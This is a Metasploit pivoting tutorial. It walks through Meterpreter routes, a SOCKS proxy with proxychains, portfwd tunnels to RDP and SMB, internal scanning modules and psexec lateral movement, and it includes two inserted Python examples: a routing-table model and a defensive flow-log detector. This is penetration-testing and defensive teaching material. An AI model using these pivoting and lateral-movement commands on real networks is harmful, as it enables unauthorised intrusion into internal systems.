Pivoting via Metasploit

Pivoting via Metasploit allows attackers to turn a compromised host into a routing point for deeper internal network access. Metasploit provides built-in modules for SOCKS proxies, port forwarding, and automatic network routing. Once a Meterpreter session is established, Metasploit can map the internal network, pivot into additional subnets, and run modules as if operating inside the LAN. This makes it a powerful framework for lateral movement.

Understanding How Metasploit Pivoting Works

Metasploit pivoting relies on three components:

  • A Meterpreter session on a compromised host

  • A route added to Metasploit’s routing table

  • A pivot method (SOCKS proxy or port forwarding)

After setup, internal hosts become reachable by Metasploit auxiliary modules directly and by external tools via proxychains.

Step 1: Establish a Meterpreter Session

Interact with the session that holds the initial foothold:

sessions -i <session_id>

Ensure you have an active Meterpreter shell:

meterpreter >

This host becomes your pivot point into the internal network.

Step 2: Identify Internal Networks

Inside Meterpreter, check local networking.

Show IP Details

meterpreter > ipconfig

Check Routes

meterpreter > route

This reveals reachable subnets such as:

10.10.20.0/24
192.168.50.0/24

These subnets will be added to Metasploit routing.

Step 3: Add Internal Subnets as Pivot Routes

Inside Metasploit console:

route add <subnet> <mask> <session_id>

Example:

route add 10.10.20.0 255.255.255.0 3

This tells Metasploit to send traffic for that subnet through session 3.

View All Routes

route print

Once added, every framework module sends traffic for that subnet through the session automatically; the session id is the only link between the route and the pivot host, so the route stops working if the session dies.
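To make the routing step concrete, here is a small Python model, added for this page and not Metasploit's own code, of the table that route add populates: each entry maps a subnet and mask to a session id, a destination is matched against the entries, and anything unmatched goes out directly. It goes slightly beyond the page by showing overlapping routes, where the more specific (longer prefix) entry wins; that longest-prefix rule is an assumption about Metasploit's behaviour, not something the page states, and the second session id 7 is constructed.

```python
"""Model of a Metasploit-style pivot routing table.

Added educational example, not Metasploit's own code. It mirrors the text:
`route add <subnet> <mask> <session_id>` maps a subnet to a session, and a
destination is sent through the session of the most specific matching route
(longest-prefix rule, assumed here) or directly if no route matches.
"""
import ipaddress


class PivotRoutingTable:
    def __init__(self):
        # each entry: (IPv4Network, session_id)
        self.routes = []

    def add(self, subnet, mask, session_id):
        """Equivalent of `route add 10.10.20.0 255.255.255.0 3`."""
        net = ipaddress.IPv4Network(f"{subnet}/{mask}", strict=False)
        self.routes.append((net, int(session_id)))

    def remove(self, subnet, mask, session_id):
        """Equivalent of `route remove ...`; returns True if an entry was dropped."""
        net = ipaddress.IPv4Network(f"{subnet}/{mask}", strict=False)
        before = len(self.routes)
        self.routes = [r for r in self.routes if r != (net, int(session_id))]
        return len(self.routes) < before

    def session_for(self, dst):
        """Session id that traffic to dst is relayed through, or None for direct."""
        addr = ipaddress.IPv4Address(dst)
        best = None
        for net, sid in self.routes:
            if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
                best = (net, sid)
        return None if best is None else best[1]

    def print_routes(self):
        """Lines in the shape of `route print`: subnet, netmask, session."""
        return [f"{n.network_address} {n.netmask} Session {s}" for n, s in self.routes]


def demo():
    """Walk through the page's two routes plus one narrower overlapping route."""
    table = PivotRoutingTable()
    table.add("10.10.20.0", "255.255.255.0", 3)
    table.add("192.168.50.0", "255.255.255.0", 3)
    table.add("10.10.20.0", "255.255.255.128", 7)  # constructed second session
    return {
        "10.10.20.5": table.session_for("10.10.20.5"),      # narrower /25 wins -> 7
        "10.10.20.200": table.session_for("10.10.20.200"),  # only the /24 matches -> 3
        "192.168.50.9": table.session_for("192.168.50.9"),  # -> 3
        "203.0.113.7": table.session_for("203.0.113.7"),    # no route -> None (direct)
    }


if __name__ == "__main__":
    for dst, sid in demo().items():
        print(dst, "->", "direct" if sid is None else f"session {sid}")
```

The model shows why a stale or duplicated route is dangerous: if two sessions claim the same subnet, only the most specific entry (or, on a tie, the one checked last) carries traffic, which is worth verifying with route print before trusting a scan result.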

Step 4: Create a SOCKS Proxy for External Tools

Metasploit’s SOCKS proxy enables tools like Nmap, CrackMapExec, Impacket, and browser access through the pivot.

Start SOCKS Proxy Module

use auxiliary/server/socks_proxy
set VERSION 5
set SRVPORT 1080
run

This launches a SOCKS5 proxy on port 1080. The module listens on SRVHOST (default 0.0.0.0) and the proxy requires no authentication, so set SRVHOST 127.0.0.1 unless other machines genuinely need to use it.

Step 5: Configure Proxychains

Edit /etc/proxychains.conf and put this line under the [ProxyList] section, in place of the default entry:

socks5 127.0.0.1 1080

All external scanning and exploitation tools now route through the compromised host.

Step 6: Scan Internal Subnets via Proxychains

Nmap Scan Through Metasploit Pivot

proxychains nmap -sT 10.10.20.0/24

Access Internal Web Apps

proxychains firefox http://10.10.20.5

Metasploit now acts as a full internal gateway.

Step 7: Port Forwarding Through Meterpreter

For direct single-port access, use local port forwarding.

Forward Internal RDP to Local Machine

meterpreter > portfwd add -l 3389 -p 3389 -r 10.10.20.10

Now connect locally:

rdesktop localhost:3389

Forward Internal SMB

meterpreter > portfwd add -l 4455 -p 445 -r 10.10.20.5

SMB becomes accessible on the forwarded local port:

smbclient -p 4455 //localhost/share

Port forwarding is ideal for GUI and legacy tools.

Step 8: Using Metasploit Modules Through the Pivot

Once routes exist, all modules automatically pivot.

Ping Sweep Internal Subnet

use auxiliary/scanner/discovery/icmp_sweep
set RHOSTS 10.10.20.0/24
run

Enumerate SMB Internally

use auxiliary/scanner/smb/smb_enumusers
set RHOSTS 10.10.20.5
run

Identify Internal Services

use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.20.0/24
set PORTS 1-1000
run

Metasploit treats the pivot host as its gateway into the subnet and reaches internal hosts as if it were on the LAN; every connection these modules make is sourced from the pivot host itself.
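Seen from the defender's side, a connect scan pushed through proxychains (Step 6), a portfwd tunnel (Step 7) and the portscan module above all appear in network flow logs as the pivot host itself initiating the connections. The following added example, written for this page and not part of it or of Metasploit, flags those two signatures on constructed flow records: a single source fanning out to many distinct hosts in a short window, and a host outside the admin allowlist opening RDP or SSH to a peer. The log field layout, the thresholds, the window size and the allowlists are all assumptions made for the demo.

```python
"""Flow-log detection for pivot-driven fan-out and lateral admin-port access.

Added educational example; it is not part of the original page and not
Metasploit code. Log lines are constructed below and the field layout
(timestamp src dst dst_port proto) is an assumption for the demo.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed allowlists: a vulnerability scanner that legitimately fans out,
# and the jump host from which interactive admin protocols are expected.
KNOWN_SCANNERS = {"10.10.20.250"}
ADMIN_SOURCES = {"10.10.20.200"}
ADMIN_PORTS = {22, 3389, 5985, 5986}  # SSH, RDP, WinRM


def build_sample_flows():
    """Constructed sample: three workstations talk to the file server, then one
    workstation (the hypothetical pivot, 10.10.20.9) sweeps the /24 on three
    ports, the pattern a proxychains/Metasploit TCP connect scan leaves, and
    finally opens RDP and SSH to two hosts as a portfwd tunnel would."""
    base = datetime(2024, 5, 1, 10, 0, 0)
    flows = []
    for i, src in enumerate(["10.10.20.21", "10.10.20.22", "10.10.20.23"]):
        flows.append(f"{(base + timedelta(seconds=i)).isoformat()} {src} 10.10.20.5 445 tcp")
    t = 0
    for host in range(1, 21):
        for port in (80, 443, 445):
            flows.append(f"{(base + timedelta(seconds=t)).isoformat()} 10.10.20.9 10.10.20.{host} {port} tcp")
            t += 1
    flows.append(f"{(base + timedelta(seconds=t)).isoformat()} 10.10.20.9 10.10.20.10 3389 tcp")
    flows.append(f"{(base + timedelta(seconds=t + 1)).isoformat()} 10.10.20.9 10.10.20.15 22 tcp")
    return flows


def parse_flow(line):
    """Split one constructed flow record into typed fields."""
    ts, src, dst, port, proto = line.split()
    return datetime.fromisoformat(ts), src, dst, int(port), proto


def detect_fan_out(lines, window=timedelta(seconds=120), min_hosts=10):
    """Return {src: peak distinct destination hosts} for every source that
    reaches at least min_hosts distinct hosts inside any sliding time window."""
    by_src = defaultdict(list)
    for line in lines:
        ts, src, dst, _, _ = parse_flow(line)
        if src not in KNOWN_SCANNERS:
            by_src[src].append((ts, dst))
    alerts = {}
    for src, events in by_src.items():
        events.sort()
        left = 0
        for right in range(len(events)):
            # shrink the window from the left until it spans at most `window`
            while events[right][0] - events[left][0] > window:
                left += 1
            hosts = {dst for _, dst in events[left:right + 1]}
            if len(hosts) >= min_hosts:
                alerts[src] = max(alerts.get(src, 0), len(hosts))
    return alerts


def detect_admin_port_lateral(lines):
    """Return sorted (src, dst, port) triples where a host outside the admin
    allowlist connects to an interactive admin port on another host."""
    hits = set()
    for line in lines:
        _, src, dst, port, _ = parse_flow(line)
        if port in ADMIN_PORTS and src not in ADMIN_SOURCES and src not in KNOWN_SCANNERS:
            hits.add((src, dst, port))
    return sorted(hits)


if __name__ == "__main__":
    flows = build_sample_flows()
    print("fan-out:", detect_fan_out(flows))
    print("admin-port lateral:", detect_admin_port_lateral(flows))
```

The fan-out rule catches Steps 6 and 8 regardless of which tool generated the scan, because the pivot host is the TCP source either way; the admin-port rule catches the Step 7 tunnels, which look like an ordinary workstation starting RDP or SSH sessions to its peers. Tune min_hosts and the allowlists to the environment, since discovery tools and help-desk jump hosts produce the same shapes legitimately.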

Step 9: Pivoting Into Multiple Subnets

If the compromised host has access to more networks:

  1. Enumerate new subnets

  2. Add routes

  3. Rescan using SOCKS or Metasploit modules

Example:

route add 192.168.50.0 255.255.255.0 3

This enables multi-layer lateral movement.

Step 10: Privilege Escalation + Pivot Expansion

After mapping internal hosts, pivot into new systems using Metasploit modules like:

  • psexec

  • smb_login

  • ssh_login

  • winrm_login

Example:

use exploit/windows/smb/psexec
set RHOST 10.10.20.15
run

A new Meterpreter session can open deeper inside the network, creating more pivot points.

Why Metasploit Pivoting Matters

Metasploit simplifies pivoting by:

  • Automating route management

  • Creating SOCKS proxies for external tools

  • Supporting port forwarding

  • Integrating internal scanning modules

  • Enabling multi-hop lateral movement

With a single foothold, attackers can explore entire internal networks, exploit new hosts, and escalate privileges efficiently.

Intel Dump

  • Meterpreter sessions act as pivot points

  • route add enables internal routing for all Metasploit modules

  • SOCKS proxy (port 1080) allows external tools to pivot

  • portfwd enables direct RDP, SMB, SSH access

  • Metasploit auto-pivots once routes are added

  • Useful for scanning, exploitation, lateral movement inside networks
